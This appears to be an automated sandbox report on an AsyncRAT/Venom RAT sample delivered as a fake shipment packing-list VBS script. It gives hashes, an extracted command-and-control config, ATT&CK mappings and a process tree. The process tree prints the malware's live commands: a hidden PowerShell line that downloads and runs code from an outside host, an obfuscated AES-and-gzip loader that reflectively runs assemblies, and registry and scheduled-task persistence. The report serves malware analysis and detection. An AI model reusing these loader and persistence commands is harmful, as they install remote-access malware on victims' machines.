asyncrat | b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5

Analysis

max time kernel
93s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2024 14:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dec_2024 Shipment Packing List.vbs
Size

67KB
MD5

0eccd58bd629893c13a11881a4707538
SHA1

0c6eb5b4ca3e92c44ea8b8e9d0841189aeb7d554
SHA256

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5
SHA512

25a8c044df81bd1e953922f897616eacb615e68e1a0e33d7606c1f4f42913c62826090e5ac4d9a7a62c20284c7206182df3b9999b7704aed692d7933015608b8
SSDEEP

1536:hvakp9tDsWXM2yd+DeYq4Vi5QBCOXU3T18Foc:tJTZrXw+i++cCOXAjc

Score

10^/10

asyncrat py 2024 discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

py 2024

45.88.88.7:6987

Mutex

vojifcrudluxshc

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000c000000023c73-117.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
1620	powershell.exe
4820	powershell.exe
4652	powershell.exe
3580	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3344	0mzoaqde.dly.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2448	timeout.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2084	powershell.exe
2084	powershell.exe
3116	powershell.exe
3116	powershell.exe
1620	powershell.exe
1620	powershell.exe
2432	powershell.exe
2432	powershell.exe
4820	powershell.exe
4820	powershell.exe
4552	powershell.exe
4552	powershell.exe
4652	powershell.exe
4652	powershell.exe
3624	powershell.exe
3624	powershell.exe
3580	powershell.exe
3580	powershell.exe
3344	0mzoaqde.dly.exe
3344	0mzoaqde.dly.exe
3344	0mzoaqde.dly.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeIncreaseQuotaPrivilege	2432	powershell.exe
Token: SeSecurityPrivilege	2432	powershell.exe
Token: SeTakeOwnershipPrivilege	2432	powershell.exe
Token: SeLoadDriverPrivilege	2432	powershell.exe
Token: SeSystemProfilePrivilege	2432	powershell.exe
Token: SeSystemtimePrivilege	2432	powershell.exe
Token: SeProfSingleProcessPrivilege	2432	powershell.exe
Token: SeIncBasePriorityPrivilege	2432	powershell.exe
Token: SeCreatePagefilePrivilege	2432	powershell.exe
Token: SeBackupPrivilege	2432	powershell.exe
Token: SeRestorePrivilege	2432	powershell.exe
Token: SeShutdownPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeSystemEnvironmentPrivilege	2432	powershell.exe
Token: SeRemoteShutdownPrivilege	2432	powershell.exe
Token: SeUndockPrivilege	2432	powershell.exe
Token: SeManageVolumePrivilege	2432	powershell.exe
Token: 33	2432	powershell.exe
Token: 34	2432	powershell.exe
Token: 35	2432	powershell.exe
Token: 36	2432	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeIncreaseQuotaPrivilege	4820	powershell.exe
Token: SeSecurityPrivilege	4820	powershell.exe
Token: SeTakeOwnershipPrivilege	4820	powershell.exe
Token: SeLoadDriverPrivilege	4820	powershell.exe
Token: SeSystemProfilePrivilege	4820	powershell.exe
Token: SeSystemtimePrivilege	4820	powershell.exe
Token: SeProfSingleProcessPrivilege	4820	powershell.exe
Token: SeIncBasePriorityPrivilege	4820	powershell.exe
Token: SeCreatePagefilePrivilege	4820	powershell.exe
Token: SeBackupPrivilege	4820	powershell.exe
Token: SeRestorePrivilege	4820	powershell.exe
Token: SeShutdownPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeSystemEnvironmentPrivilege	4820	powershell.exe
Token: SeRemoteShutdownPrivilege	4820	powershell.exe
Token: SeUndockPrivilege	4820	powershell.exe
Token: SeManageVolumePrivilege	4820	powershell.exe
Token: 33	4820	powershell.exe
Token: 34	4820	powershell.exe
Token: 35	4820	powershell.exe
Token: 36	4820	powershell.exe
Token: SeIncreaseQuotaPrivilege	4820	powershell.exe
Token: SeSecurityPrivilege	4820	powershell.exe
Token: SeTakeOwnershipPrivilege	4820	powershell.exe
Token: SeLoadDriverPrivilege	4820	powershell.exe
Token: SeSystemProfilePrivilege	4820	powershell.exe
Token: SeSystemtimePrivilege	4820	powershell.exe
Token: SeProfSingleProcessPrivilege	4820	powershell.exe
Token: SeIncBasePriorityPrivilege	4820	powershell.exe
Token: SeCreatePagefilePrivilege	4820	powershell.exe
Token: SeBackupPrivilege	4820	powershell.exe
Token: SeRestorePrivilege	4820	powershell.exe
Token: SeShutdownPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeSystemEnvironmentPrivilege	4820	powershell.exe
Token: SeRemoteShutdownPrivilege	4820	powershell.exe
Token: SeUndockPrivilege	4820	powershell.exe
Token: SeManageVolumePrivilege	4820	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3344	0mzoaqde.dly.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 2084	4636	WScript.exe	83
PID 4636 wrote to memory of 2084	4636	WScript.exe	83
PID 4636 wrote to memory of 3204	4636	WScript.exe	100
PID 4636 wrote to memory of 3204	4636	WScript.exe	100
PID 3204 wrote to memory of 3980	3204	cmd.exe	102
PID 3204 wrote to memory of 3980	3204	cmd.exe	102
PID 3980 wrote to memory of 4076	3980	cmd.exe	104
PID 3980 wrote to memory of 4076	3980	cmd.exe	104
PID 3980 wrote to memory of 3116	3980	cmd.exe	105
PID 3980 wrote to memory of 3116	3980	cmd.exe	105
PID 3116 wrote to memory of 1620	3116	powershell.exe	106
PID 3116 wrote to memory of 1620	3116	powershell.exe	106
PID 3116 wrote to memory of 2432	3116	powershell.exe	107
PID 3116 wrote to memory of 2432	3116	powershell.exe	107
PID 3116 wrote to memory of 4820	3116	powershell.exe	110
PID 3116 wrote to memory of 4820	3116	powershell.exe	110
PID 3116 wrote to memory of 2724	3116	powershell.exe	112
PID 3116 wrote to memory of 2724	3116	powershell.exe	112
PID 2724 wrote to memory of 4428	2724	cmd.exe	114
PID 2724 wrote to memory of 4428	2724	cmd.exe	114
PID 4428 wrote to memory of 2804	4428	cmd.exe	116
PID 4428 wrote to memory of 2804	4428	cmd.exe	116
PID 4428 wrote to memory of 4552	4428	cmd.exe	117
PID 4428 wrote to memory of 4552	4428	cmd.exe	117
PID 4552 wrote to memory of 4652	4552	powershell.exe	118
PID 4552 wrote to memory of 4652	4552	powershell.exe	118
PID 3980 wrote to memory of 2448	3980	cmd.exe	119
PID 3980 wrote to memory of 2448	3980	cmd.exe	119
PID 4552 wrote to memory of 3624	4552	powershell.exe	120
PID 4552 wrote to memory of 3624	4552	powershell.exe	120
PID 4552 wrote to memory of 3580	4552	powershell.exe	122
PID 4552 wrote to memory of 3580	4552	powershell.exe	122
PID 4552 wrote to memory of 3344	4552	powershell.exe	124
PID 4552 wrote to memory of 3344	4552	powershell.exe	124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dec_2024 Shipment Packing List.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
      4⤵
      PID:4076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\system')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 12168' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network12168Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network12168Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network12168Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network12168Man.cmd';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
        7⤵
        
        PID:2804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network12168Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 12168' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network12168Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\0mzoaqde.dly.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0mzoaqde.dly.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3344
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:2448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc67586142be89ec1087886696c58ef9

SHA1
e934fa408b285797b41ace4076b6d8fdbeae3ff2

SHA256
45ae0b4218020dad7b03769ef02ee4a699f8b9d74f8c713863865e38322639b6

SHA512
227af05c21022179f81574000d903756c7754e0685941b919cd7ff575597434bb3a71c19020418316d6e45c40d329900216d6d930a3043d47be6d395ed34d780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04ea802d1bc21ef101f357f18aa78e08

SHA1
690354ee774ab6cc112225e67727bbbcbb9934a6

SHA256
bfc01175be8dbd63bba30239b6aaaeb1fd2351867432d1390df0b3be902e74ea

SHA512
2241d40c6e3c51d4f670d1679883352ff750bf7619b77e19719303f9c901328b8561cc000768b6227857af22686ceff202be06a6a1912befff300f17f9f83517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1e9276cbdc6c73f8258e1ba59125a55

SHA1
2deb838e5103d6874b67f83dfd40ebdff02ff3ca

SHA256
62ff8c63c2862166e0a0b87d7809070e37a2cb3d028935c6cfbd4fc21d5f86d4

SHA512
12a316b04ac5f91ffac66751d9e2527cfc2f8444039d977a623c16e3c346083a68a011dfa57735c214e9e2d9b3137d853a4dac5f96fc29f33fa48a1978265b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\0mzoaqde.dly.exe

Filesize
74KB

MD5
d727c2421ba70ad5cceaf025cc37655c

SHA1
dc1414aa601f356f058fd07a991aba651147dea1

SHA256
2b1bd21d22d83db31ce0270318e21691483280faf580840c9157388a785c08a8

SHA512
7788d7ee677006e5a19084618dbfb7d9661d236368e903dddd277f3e44c729cd921bab0737409fab277f58b15f904bd12dfc60901c39b62a84a3434355d22046

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm3xpfuu.o0e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
c1cffa7be0703f50d79684e9ec4c9069

SHA1
e359431db8731b7e5966463906d6e24df8515744

SHA256
298ce1e8c043395147512b3c7f6e99b2bbfea09fd3c53a4fb34e5f384457f682

SHA512
6eece0756aaf8a65b4a425329a9d0ec0d46f2ae4d13439a453c279560ccda356a24ac501cd4b55570e2caf0dec732ed51ddb69f71cdea936d0052fa9666d258c

Download Submit
memory/2084-11-0x00007FFC6E590000-0x00007FFC6F051000-memory.dmp

Filesize
10.8MB

Download
memory/2084-0-0x00007FFC6E593000-0x00007FFC6E595000-memory.dmp

Filesize
8KB

Download
memory/2084-16-0x00007FFC6E590000-0x00007FFC6F051000-memory.dmp

Filesize
10.8MB

Download
memory/2084-13-0x00007FFC6E590000-0x00007FFC6F051000-memory.dmp

Filesize
10.8MB

Download
memory/2084-12-0x00007FFC6E590000-0x00007FFC6F051000-memory.dmp

Filesize
10.8MB

Download
memory/2084-10-0x0000027D62D70000-0x0000027D62D92000-memory.dmp

Filesize
136KB

Download
memory/3116-32-0x0000027F64320000-0x0000027F64396000-memory.dmp

Filesize
472KB

Download
memory/3116-43-0x0000027F64240000-0x0000027F64252000-memory.dmp

Filesize
72KB

Download
memory/3116-31-0x0000027F64250000-0x0000027F64294000-memory.dmp

Filesize
272KB

Download
memory/3344-124-0x0000000000B10000-0x0000000000B28000-memory.dmp

Filesize
96KB

Download
memory/4552-90-0x000001669CDD0000-0x000001669CDE2000-memory.dmp

Filesize
72KB

Download